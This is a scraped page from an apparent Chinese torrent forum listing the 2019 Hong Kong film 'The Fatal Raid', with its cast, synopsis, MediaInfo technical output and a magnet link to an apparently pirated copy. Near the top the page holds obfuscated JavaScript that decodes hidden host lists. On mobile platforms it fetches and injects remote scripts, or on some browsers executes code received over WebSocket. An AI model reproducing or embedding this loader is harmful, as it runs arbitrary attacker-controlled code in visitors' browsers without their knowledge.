辣警霸王花:澳门行动[国粤语音轨/中文字幕]The.Fatal.Raid.2019.1080p.BluRay.x264.DTS.2Audio-迅雷下载 11.49GB

版主小s 1月前 491

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 辣警霸王花:澳门行动 / 辣警霸王花2不义之战 / 不义之战 / The Fatal Raid / Special Female Force II
◎片  名 不義之戰
◎年  代 2019
◎产  地 中国香港
◎类  别 剧情 / 喜剧 / 动作
◎语  言 粤语 / 汉语普通话
◎上映日期 2020-08-14(中国大陆) / 2019-09-26(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt10619512/
◎豆瓣评分 3.0/10 (807人评价)
◎豆瓣链接 https://movie.douban.com/subject/27135563/
◎片  长 91分钟
◎导  演 李志伦 Jacky Lee (id:1416786)
◎演  员 谭耀文 Patrick Tam (id:1033280)
       梁琤 Jade Leung (id:1037821)
       杨恭如 Kristy Yang (id:1016866)
       袁文杰 Andrew Yuen (id:1320199)
       何佩瑜 Jeana Ho (id:1316213)
       林明祯 Min-Chen Lin (id:1358564)
       唐文龙 Michael Tong (id:1043564)
       邓洢玲 Elaine Tang (id:1400026)
       吕珊 Rosanne Lui (id:1333242)
       陆诗韵 Sharon Luk (id:1337532)
       赵善恒 Sin-Hang Chiu (id:1328459)
       杨潮凯 Chiu Hoi Yeung (id:1333245)
       钟浩贤 Ho Yin Chung (id:1377271)
       吴云甫 Owen Ng (id:1365648)
       谢可逸 Tse Ho Yat (id:1388272)
       张文杰 Man Kit Cheung (id:1336383)
       小肥 Terence Siufay (id:1316260)
       陈慧敏 Vivian Chan (id:1354953)
       李英涛 Ying-to Li (id:1359512)
       徐佳琦 Jiaqi Xu (id:1366856)
       霍俊邦 Jeffrey Fok (id:1405294)
       袁绮雯 Yee-Man Yuen (id:1405639)
       林慧倩 Giselle Lam (id:1380809)
       苏浩才 Sammy So (id:1394916)
       钱国伟 Wilson Chin (id:1320972)

◎标  签 香港 / 动作 / 警匪 / 香港电影 / 犯罪 / 霸王花 / 电影 / 2019

◎简  介
  香港,警探谭家明(谭耀文 饰)因多年前与挚友同伴唐警探(唐文龙 饰演)兄弟反目,其妻子阿雪(杨恭如 饰)又病重,他失意潦倒之际,一日遇上城中雷厉风行的辣警霸王花Madam梁(梁琤 饰)和她手下的女子兵团,是敌是友,火拼再起......

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 219578183173665410402596687719026454141 (0xA531384585C977F31816C17CD6B0EE7D)
  4. Complete name                            : [email protected]M.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 11.5 GiB
  8. Duration                                 : 1 h 31 min
  9. Overall bit rate                         : 18.0 Mb/s
  10. Encoded date                             : UTC 2021-07-27 10:44:12
  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : AVC
  16. Format/Info                              : Advanced Video Codec
  17. Format profile                           : [email protected]
  18. Format settings                          : CABAC / 4 Ref Frames
  19. Format settings, CABAC                   : Yes
  20. Format settings, Reference frames        : 4 frames
  21. Codec ID                                 : V_MPEG4/ISO/AVC
  22. Duration                                 : 1 h 31 min
  23. Bit rate                                 : 15.0 Mb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 804 pixels
  26. Display aspect ratio                     : 2.40:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 8 bits
  32. Scan type                                : Progressive
  33. Bits/(Pixel*Frame)                       : 0.405
  34. Stream size                              : 9.54 GiB (83%)
  35. Writing library                          : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]
  36. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.5000 / qcomp=0.80 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.60 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  37. Language                                 : English
  38. Default                                  : Yes
  39. Forced                                   : No
  40. Audio #1
  41. ID                                       : 2
  42. Format                                   : DTS
  43. Format/Info                              : Digital Theater Systems
  44. Codec ID                                 : A_DTS
  45. Duration                                 : 1 h 31 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 1 510 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : C L R Ls Rs LFE
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 93.750 FPS (512 SPF)
  52. Bit depth                                : 24 bits
  53. Compression mode                         : Lossy
  54. Stream size                              : 984 MiB (8%)
  55. Title                                    : Cantonese
  56. Language                                 : Chinese
  57. Default                                  : Yes
  58. Forced                                   : No
  59. Audio #2
  60. ID                                       : 3
  61. Format                                   : DTS
  62. Format/Info                              : Digital Theater Systems
  63. Codec ID                                 : A_DTS
  64. Duration                                 : 1 h 31 min
  65. Bit rate mode                            : Constant
  66. Bit rate                                 : 1 510 kb/s
  67. Channel(s)                               : 6 channels
  68. Channel layout                           : C L R Ls Rs LFE
  69. Sampling rate                            : 48.0 kHz
  70. Frame rate                               : 93.750 FPS (512 SPF)
  71. Bit depth                                : 24 bits
  72. Compression mode                         : Lossy
  73. Stream size                              : 984 MiB (8%)
  74. Title                                    : Mandarin
  75. Language                                 : Chinese
  76. Default                                  : No
  77. Forced                                   : No
  78. Text #1
  79. ID                                       : 4
  80. Format                                   : PGS
  81. Muxing mode                              : zlib
  82. Codec ID                                 : S_HDMV/PGS
  83. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  84. Duration                                 : 1 h 26 min
  85. Bit rate                                 : 22.1 kb/s
  86. Count of elements                        : 1213
  87. Stream size                              : 13.6 MiB (0%)
  88. Title                                    : cht
  89. Language                                 : Chinese
  90. Default                                  : No
  91. Forced                                   : No
  92. Text #2
  93. ID                                       : 5
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 1 h 26 min
  99. Bit rate                                 : 21.7 kb/s
  100. Count of elements                        : 1213
  101. Stream size                              : 13.4 MiB (0%)
  102. Title                                    : chs
  103. Language                                 : Chinese
  104. Default                                  : Yes
  105. Forced                                   : No
  106. Text #3
  107. ID                                       : 6
  108. Format                                   : PGS
  109. Muxing mode                              : zlib
  110. Codec ID                                 : S_HDMV/PGS
  111. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  112. Duration                                 : 1 h 26 min
  113. Bit rate                                 : 29.3 kb/s
  114. Count of elements                        : 1221
  115. Stream size                              : 18.1 MiB (0%)
  116. Title                                    : eng
  117. Language                                 : English
  118. Default                                  : No
  119. Forced                                   : No
  120. Menu
  121. 00:00:00.000                             : :第 01 章
  122. 00:07:10.833                             : :第 02 章
  123. 00:14:52.292                             : :第 03 章
  124. 00:24:00.250                             : :第 04 章
  125. 00:29:17.542                             : :第 05 章
  126. 00:37:38.542                             : :第 06 章
  127. 00:44:03.167                             : :第 07 章
  128. 00:53:44.292                             : :第 08 章
  129. 01:01:15.583                             : :第 09 章
  130. 01:10:00.833                             : :第 10 章
  131. 01:15:13.542                             : :第 11 章
  132. 01:27:07.417                             : :第 12 章


TAGS 动作 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:1BFF7270790890816BD2EE3BB523A344C5C28420
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回